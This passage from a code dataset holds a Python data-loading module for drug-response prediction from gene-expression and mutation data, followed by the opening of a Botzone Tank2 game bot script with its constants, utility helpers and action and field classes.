get_unlabeld_mut_dataloader(self, match=True): if match: mut_gex_samples = self.gex_dat.index.intersection(self.mut_dat.index) mut_gex_dataset = TensorDataset( torch.from_numpy(self.mut_dat.loc[mut_gex_samples].values.astype('float32')), torch.from_numpy(self.gex_dat.loc[mut_gex_samples].values.astype('float32')) ) unlabeled_mut_gex_dataloader = DataLoader(mut_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True ) return unlabeled_mut_gex_dataloader else: mut_dataset = TensorDataset(torch.from_numpy(self.mut_dat.values.astype('float32'))) unlabeled_mut_dataloader = DataLoader(mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return unlabeled_mut_dataloader def get_labeled_samples(self): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] return labeled_samples, mut_only_labeled_samples
<filename>data.py import os import datetime import numpy as np import random import pandas as pd import data_config import torch from torch.utils.data import TensorDataset, DataLoader from sklearn.model_selection import train_test_split, StratifiedKFold _RNG_SEED = None DRUG_DICT = { 'gem': 'gemcitabine', 'ava': 'avagacestat', } def get_rng(obj=None): """ This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. """ seed = (id(obj) + os.getpid() + int(datetime.now().strftime("%Y%m%d%H%M%S%f"))) % 4294967295 if _RNG_SEED is not None: seed = _RNG_SEED return random.Random(seed) class DataProvider: def __init__(self, batch_size=64, target='AUC', random_seed=2019): self.seed = random_seed self.target = target self.batch_size = batch_size self._load_gex_data() self._load_mut_data() self._load_target_data() self.shape_dict = {'gex': self.gex_dat.shape[-1], 'mut': self.mut_dat.shape[-1], 'target': self.target_df.shape[-1]} def _load_gex_data(self): self.gex_dat = pd.read_csv(data_config.gex_feature_file, index_col=0) # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] def _load_mut_data(self): self.xena_mut_dat = pd.read_csv(data_config.xena_mut_uq_file, index_col=0) self.ccle_mut_dat = pd.read_csv(data_config.ccle_mut_uq_file, index_col=0) self.mut_dat = self.xena_mut_dat.append(self.ccle_mut_dat) def _load_target_data(self): # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) target = self.target.lower() gdsc_target_df = pd.read_csv(data_config.gdsc_target_file) gdsc_target_df = gdsc_target_df[['COSMIC_ID', 'DRUG_NAME', target]] gdsc_target_df.dropna(subset=[target], inplace=True) gdsc_target_df = gdsc_target_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() target_df = gdsc_target_df.reset_index().pivot_table(values=target, index='COSMIC_ID', columns='DRUG_NAME') ccle_sample_info = pd.read_csv(data_config.ccle_sample_file, index_col=4) ccle_sample_info = ccle_sample_info.loc[ccle_sample_info.index.dropna()] ccle_sample_info.index = ccle_sample_info.index.astype('int') gdsc_sample_info = pd.read_csv(data_config.gdsc_sample_file, header=0, index_col=1) gdsc_sample_info = gdsc_sample_info.loc[gdsc_sample_info.index.dropna()] gdsc_sample_info.index = gdsc_sample_info.index.astype('int') gdsc_sample_mapping = gdsc_sample_info.merge(ccle_sample_info, left_index=True, right_index=True, how='inner')[ ['DepMap_ID']] gdsc_sample_mapping_dict = gdsc_sample_mapping.to_dict()['DepMap_ID'] target_df.index = target_df.index.map(gdsc_sample_mapping_dict) target_df = target_df.loc[target_df.index.dropna()] gex_labeled_samples = self.gex_dat.index.intersection(target_df.index) target_df.drop(columns=target_df.columns[ target_df.loc[gex_labeled_samples].isna().sum() / len(gex_labeled_samples) >= 0.1], inplace=True) self.target_df = target_df def get_unlabeled_gex_dataloader(self): gex_dataset = TensorDataset(torch.from_numpy(self.gex_dat.values.astype('float32'))) unlabeled_gex_dataloader = DataLoader(gex_dataset, batch_size=self.batch_size, shuffle=True) return unlabeled_gex_dataloader def get_labeled_data_generator(self, omics='mut'): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] labeled_target_df = self.target_df.loc[labeled_samples] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_labeled_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) sample_label_vec = ( labeled_target_df.isna().sum(axis=1) <= labeled_target_df.isna().sum(axis=1).median()).astype('int') s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) if omics == 'gex': for train_index, test_index in s_kfold.split(self.gex_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[labeled_samples].values[train_index], \ self.gex_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader else: for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_labeled_gex_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] labeled_gex_dataset = TensorDataset( torch.from_numpy(self.gex_dat.loc[gex_labeled_samples].values.astype('float32')), torch.from_numpy(gex_target_df.values.astype('float32')) ) labeled_gex_dataloader = DataLoader(labeled_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_gex_dataloader def get_labeled_mut_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_mut_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_labeled_samples].values.astype('float32')), torch.from_numpy(mut_target_df.values.astype('float32')) ) labeled_mut_dataloader = DataLoader(labeled_mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_mut_dataloader, labeled_drug_mut_only_dataloader def get_drug_labeled_gex_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] sample_label_vec = (gex_target_df.isna().sum(axis=1) <= gex_target_df.isna().sum(axis=1).median()).astype('int') if not ft_flag: pass else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.gex_dat.loc[gex_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[gex_labeled_samples].values[train_index], \ self.gex_dat.loc[gex_labeled_samples].values[test_index] train_labels, test_labels = gex_target_df.values[train_index].astype('float32'), gex_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True,drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader def get_drug_labeled_mut_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] sample_label_vec = (mut_target_df.isna().sum(axis=1) <= mut_target_df.isna().sum(axis=1).median()).astype('int') labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) if not ft_flag: pass # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[mut_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[mut_labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[mut_labeled_samples].values[test_index] train_labels, test_labels = mut_target_df.values[train_index].astype('float32'), mut_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_unlabeld_mut_dataloader(self, match=True): if match: mut_gex_samples = self.gex_dat.index.intersection(self.mut_dat.index) mut_gex_dataset = TensorDataset( torch.from_numpy(self.mut_dat.loc[mut_gex_samples].values.astype('float32')), torch.from_numpy(self.gex_dat.loc[mut_gex_samples].values.astype('float32')) ) unlabeled_mut_gex_dataloader = DataLoader(mut_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True ) return unlabeled_mut_gex_dataloader else: mut_dataset = TensorDataset(torch.from_numpy(self.mut_dat.values.astype('float32'))) unlabeled_mut_dataloader = DataLoader(mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return unlabeled_mut_dataloader def get_labeled_samples(self): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] return labeled_samples, mut_only_labeled_samples
en
0.327723
This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader
2.377337
2
build/botzone_tank2.py
zhongxinghong/Botzone-Tank2
11
6628980
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game """ MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# DEBUG_MODE = False LONG_RUNNING_MODE = False SIMULATOR_ENV = False COMPACT_MAP = False SIMULATOR_PRINT = True #-------------# # Game Config # #-------------# MAP_HEIGHT = 9 MAP_WIDTH = 9 SIDE_COUNT = 2 TANKS_PER_SIDE = 2 #-------------# # Game Status # #-------------# GAME_STATUS_NOT_OVER = -2 GAME_STATUS_DRAW = -1 GAME_STATUS_BLUE_WIN = 0 GAME_STATUS_RED_WIN = 1 BLUE_SIDE = 0 RED_SIDE = 1 #{ END 'const.py' }# #{ BEGIN 'global_.py' }# import time import sys import types import json import random import pickle import base64 import gzip import hashlib import numpy as np from collections import deque from pprint import pprint import functools from contextlib import contextmanager from copy import deepcopy #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# _null_func = lambda *args, **kwargs: None if DEBUG_MODE: debug_print = print debug_pprint = pprint else: debug_print = _null_func debug_pprint = _null_func if SIMULATOR_ENV and SIMULATOR_PRINT: simulator_print = print simulator_pprint = pprint else: simulator_print = _null_func simulator_pprint = _null_func @contextmanager def outer_label(): """ 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer """ class _GotoOuterException(Exception): pass try: yield _GotoOuterException() # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 except _GotoOuterException: # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 pass class _Missing(object): """ from werkzeug._internal """ def __repr__(self): return 'no value' def __reduce__(self): return '_missing' _MISSING = _Missing() class CachedProperty(property): """ from werkzeug.utils """ def __init__(self, func, name=None, doc=None): self.__name__ = name or func.__name__ self.__module__ = func.__module__ self.__doc__ = doc or func.__doc__ self.func = func def __set__(self, obj, value): obj.__dict__[self.__name__] = value def __get__(self, obj, type=None): if obj is None: return self value = obj.__dict__.get(self.__name__, _MISSING) if value is _MISSING: value = self.func(obj) obj.__dict__[self.__name__] = value return value @staticmethod def clean(obj, key): """ 清除缓存 """ obj.__dict__.pop(key, None) def memorize(func): """ 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 """ def _make_key(func, *args, **kwargs): _key = ( func.__module__, func.__name__, args, sorted(kwargs.items()) # kwargs 自动排序 ) return hashlib.md5(pickle.dumps(_key)).hexdigest() def _clear_memory(func): if hasattr(func, "__memory__"): func.__memory__.clear() @functools.wraps(func) def wrapper(*args, **kwargs): if not hasattr(func, "__memory__"): func.__memory__ = {} key = _make_key(func, *args, **kwargs) res = func.__memory__.get(key, _MISSING) if res is _MISSING: res = func(*args, **kwargs) if isinstance(res, types.GeneratorType): res = list(res) # 如果返回结果是生成器,那么马上获得所有结果 func.__memory__[key] = res return res wrapper.make_key = functools.partial(_make_key, func) wrapper.clear_memory = functools.partial(_clear_memory, func) return wrapper class SingletonMeta(type): """ Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py """ _instance = {} def __call__(cls, *args, **kwargs): if cls not in cls._instance: cls._instance[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs) return cls._instance[cls] class UniqueIntEnumMeta(type): """ 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 """ def __new__(cls, name, bases, attrs): offset = attrs.get("__offset__", 0) # 默认为 0 for k, v in attrs.items(): if isinstance(v, int): attrs[k] += offset return super(UniqueIntEnumMeta, cls).__new__(cls, name, bases, attrs) class DataSerializer(object): @staticmethod def _unpad(s): return s.rstrip("=") @staticmethod def _pad(s): return s + "=" * ( 4 - len(s) % 4 ) @staticmethod def serialize(obj): return __class__._unpad( base64.b64encode( gzip.compress( pickle.dumps(obj))).decode("utf-8")) @staticmethod def deserialize(s): return pickle.loads( gzip.decompress( base64.b64decode( __class__._pad(s).encode("utf-8")))) #{ END 'utils.py' }# #{ BEGIN 'action.py' }# class Action(object): # 空与无效 DUMMY = -3 # 额外添加的 INVALID = -2 # 停止 STAY = -1 # 移动 MOVE_UP = 0 MOVE_RIGHT = 1 MOVE_DOWN = 2 MOVE_LEFT = 3 # 射击 SHOOT_UP = 4 SHOOT_RIGHT = 5 SHOOT_DOWN = 6 SHOOT_LEFT = 7 # 根据 action 的值判断移动方向和射击方向 DIRECTION_OF_ACTION_X = ( 0, 1, 0, -1 ) DIRECTION_OF_ACTION_Y = ( -1, 0, 1, 0 ) DIRECTION_OF_ACTION_XY = ( (0,-1), (1,0), (0,1), (-1,0) ) # 方便用于迭代 MOVE_ACTIONS = ( MOVE_UP, MOVE_RIGHT, MOVE_DOWN, MOVE_LEFT ) SHOOT_ACTIONS = ( SHOOT_UP, SHOOT_RIGHT, SHOOT_DOWN, SHOOT_LEFT ) VALID_ACTIONS = ( STAY, ) + MOVE_ACTIONS + SHOOT_ACTIONS _ACTION_NAMES = [ "Invalid", "Stay", "Up Move", "Right Move", "Down Move", "Left Move", "Up Shoot", "Right Shoot", "Down Shoot", "Left Shoot", ] @staticmethod def is_valid(action): # 是否为有效行为 return -1 <= action <= 7 @staticmethod def is_stay(action): # 是否为停止行为 return action == -1 @staticmethod def is_move(action): # 是否为移动行为 return 0 <= action <= 3 @staticmethod def is_shoot(action): # 是否为射击行为 return 4 <= action <= 7 @staticmethod def is_opposite(action1, action2): """ 两个行动方向是否相对 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == (action2 + 2) % 4 @staticmethod def is_same_direction(action1, action2): """ 两个行动方向是否相同 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == action2 % 4 @staticmethod def get_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的 move 行为值 可以不相邻! """ dx = np.sign(x2 - x1) dy = np.sign(y2 - y1) if dx == dy == 0: return -1 # STAY for idx, dxy in enumerate(__class__.DIRECTION_OF_ACTION_XY): if (dx, dy) == dxy: return idx else: raise Exception("can't move from (%s, %s) to (%s, %s) in one turn" % (x1, y1, x2, y2) ) @staticmethod def get_move_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... """ return __class__.get_action(x1, y1, x2, y2) @staticmethod def get_shoot_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 """ return __class__.get_action(x1, y1, x2, y2) + 4 @staticmethod def get_name(action): return __class__._ACTION_NAMES[action + 2] #{ END 'action.py' }# #{ BEGIN 'field.py' }# class Field(object): DUMMY = -1 EMPTY = 0 BRICK = 1 STEEL = 2 WATER = 3 #-----------------------# # rule: BASE + 1 + side # #-----------------------# BASE = 4 # side = -1 BLUE_BASE = 5 # side = 0 RED_BASE = 6 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# TANK = 7 # side = -1 BLUE_TANK = 8 # side = 0 RED_TANK = 9 # side = 1 MULTI_TANK = 10 def __init__(self, x, y, type): self.x = x self.y = y self.type = type self.destroyed = False @property def xy(self): return (self.x, self.y) @property def yx(self): return (self.y, self.x) def __repr__(self): return "%s(%d, %d)" % ( self.__class__.__name__, self.x, self.y) class EmptyField(Field): def __init__(self, x, y): super().__init__(x, y, Field.EMPTY) class BrickField(Field): def __init__(self, x, y): super().__init__(x, y, Field.BRICK) class SteelField(Field): def __init__(self, x, y): super().__init__(x, y, Field.STEEL) class WaterField(Field): def __init__(self, x, y): super().__init__(x, y, Field.WATER) class BaseField(Field): def __init__(self, x, y, side): super().__init__(x, y, Field.BASE) self._side = side @property def side(self): return self._side def __repr__(self): return "%s(%d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, 